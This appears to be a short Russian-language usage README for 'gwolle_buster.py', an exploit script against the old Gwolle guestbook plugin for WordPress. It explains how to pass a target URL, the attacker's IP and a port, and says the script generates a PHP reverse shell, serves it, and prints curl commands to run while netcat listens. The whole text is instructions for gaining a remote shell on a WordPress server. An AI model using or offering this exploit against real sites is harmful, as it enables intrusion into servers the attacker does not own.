
Этот скрипт — эксплойт для старого плагина WordPress gwolle.
этот скрипт — эксплойт для старого плагина gwolle в wordpress
использование:
./gwolle_buster.py <target_url>
первый аргумент <target_url> => URL вашего сайта wordpress, на котором установлен gwolle второй аргумент => ваш IP-адрес третий аргумент => порт прослушивания для reverse shell
пример: ./gwolle_buster.py http://vulnpress.com/ 192.168.1.5 1234
Этот скрипт сгенерирует php-скрипт reverse shell и запустит простой сервер, поэтому вам нужно открыть 2 новых терминала, слушать netcat в первом терминале и выполнять запросы с помощью curl, однако команды генерируются автоматически и появляются в консоли, так что вы можете легко копировать и вставлять их.